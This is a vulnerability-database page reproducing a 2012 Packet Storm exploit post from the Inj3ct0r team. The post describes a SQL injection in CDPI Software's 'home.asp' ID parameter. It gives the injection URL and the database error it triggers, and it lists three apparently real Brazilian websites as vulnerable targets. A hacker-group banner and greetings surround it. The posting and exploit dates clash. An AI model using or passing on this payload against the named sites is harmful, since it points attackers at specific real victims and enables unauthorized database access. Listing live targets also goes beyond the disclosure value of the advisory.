Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormITTIHACKPACKETSTORM:109917
HistoryFeb 18, 2012 - 12:00 a.m.

CDPI Software SQL Injection

2012-02-1800:00:00
ITTIHACK
packetstormsecurity.com
17
JSON
`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [x] Official Website: http://www.1337day.com 0  
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1  
0 0  
1 ========================================== 1  
0 I'm Dark-Puzzle From Inj3ct0r TEAM 0  
0 1  
1 dark-puzzle[at]live[at]fr 0  
0 ========================================== 1  
1 Pentesting/exploit coding/bug research 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1  
[0day Exploits] Allah , Alwatan , Almalik .[0day Exploits]  
  
# Exploit Title: CDPIsite "home.asp" - SQL injection Vulnerability  
# Date: 24 June 2012  
# Author: Dark-Puzzle  
# Vendor Website : http://www.cdpisite.com.br/  
# Version: All Versions   
# Category: Webapps/0day  
# Google dork: N/A  
# Tested on: Windows Xp Sp2 , Backtrack 5 .  
  
-----------------------------------------------------------  
  
Exploit :  
  
http://www.example.com/home.asp?ID=99'  
  
Asp Error :  
  
Microsoft OLE DB Provider for ODBC Drivers erro '80040e14'  
  
[MySQL][ODBC 5.1 Driver][mysqld-5.1.63]Voc  
  
/[PATH]/detalhes.asp, line 8   
  
Example Sites :  
  
http://jubileuvidros.com.br/jubileuvidros/home.asp?ID=4'  
http://www.paulabrottoimoveis.com.br/paulabrottoimoveis/home.asp?ID=1095'  
http://www.rivieraimoveiscompany.com.br/rivieraimoveiscompany/home.asp?ID=773'  
  
------------------------------------------------------------  
  
Follow me : https://www.facebook.com/dark.puzzle  
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army  
  
Greetz to : M.C.A , Team-Hunter , Inj3ctor Team , Dr.napst3r , Jigs@w ...  
  
`
JSON